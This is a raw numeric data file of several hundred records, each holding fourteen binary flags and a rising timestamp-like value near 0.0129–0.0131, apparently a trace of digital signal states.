0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928292e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928316e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928340e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928348e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2928392e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928416e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928424e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928444e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928468e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928492e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928516e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928540e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928564e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928592e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928616e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928644e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928668e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928692e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928716e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,1.2928720e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928724e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2928768e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928792e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,1.2928796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928800e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928816e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928844e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928868e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928892e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928916e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928940e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2928964e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2928992e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2928996e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2929044e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929068e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929092e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929116e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929140e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929164e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929172e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2929220e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929244e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929252e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929268e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929292e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929316e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929344e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929368e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929420e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929444e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929468e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929492e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929516e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929544e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929568e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929596e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929620e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929644e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929692e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929716e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929744e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929748e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2929796e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929820e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929844e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929868e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929876e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2929920e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2929944e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929952e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2929972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2929996e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930020e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930044e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930072e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930100e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930124e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930152e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2930156e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2930204e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2930228e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930236e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930352e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930552e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930752e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930776e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2930780e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2930828e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2930852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930860e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930876e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930900e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2930956e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2930980e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931004e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931028e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931052e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2931060e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2931076e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2931104e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2931128e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2931156e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,1.2931160e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931164e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931204e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931280e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931304e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931332e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931356e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931380e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931404e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931428e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931452e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2931460e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2931504e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2931532e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,1.2931536e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931540e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931556e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931580e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931704e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931728e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931756e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931780e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931804e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931904e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931928e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2931956e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2931980e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932004e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932104e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932128e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932156e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932180e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932184e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2932204e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932228e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2932252e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932284e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932332e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932356e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932504e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932528e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932532e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2932580e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932612e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932628e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932652e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932704e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932728e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932756e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932780e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932804e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932808e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,1.2932852e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2932880e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,1.2932884e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932888e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932904e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932928e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2932956e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2932980e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933004e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933104e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933128e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933156e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933180e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933204e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933304e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933328e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933356e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933380e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933504e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933528e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933556e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933580e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933604e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933704e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933728e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933756e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933780e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933804e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933904e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933928e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2933956e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2933980e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934004e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934104e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934128e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934156e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934180e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934204e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934304e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934328e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934356e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934380e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,1.2934404e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,1.2934428e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,1.2934436e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,1.3058972e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.3059176e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,1.3059204e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.3059228e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,1.3059548e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.3059572e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.3059580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.3059596e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.3059620e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.3059644e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.3059672e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.3059696e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.3059724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.3059748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,1.3059772e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,1.3059796e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3059804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3059820e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3059844e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3059872e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3059896e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3059924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3059948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3059972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3059996e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060020e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060028e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3060072e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060104e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060124e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060148e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060172e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060196e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060220e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060244e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060252e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3060300e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060324e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060372e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060396e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060420e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060444e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060472e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060496e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060572e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060596e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060620e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060644e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060652e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3060700e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060772e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060796e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060820e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060844e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3060872e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3060896e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060924e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3060972e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3060996e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061020e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061044e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061072e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061096e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3061100e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3061148e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3061172e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061180e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061196e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061220e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061244e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061272e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061296e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061372e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061396e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061420e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061444e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061572e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061596e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061620e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061644e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061672e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061696e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3061724e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3061772e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3061796e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061804e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061820e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061844e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3061852e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3061900e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3061924e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061932e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3061972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3061996e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062020e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062044e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062072e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062096e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3062124e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3062172e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3062196e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062204e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062220e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062244e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062272e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062296e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062324e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062348e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062372e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062396e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062420e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062444e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062472e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062496e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062524e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062548e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062572e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062596e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062620e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062644e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062672e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062696e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062724e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,1.3062748e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3062752e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3062796e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3062820e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062848e-02 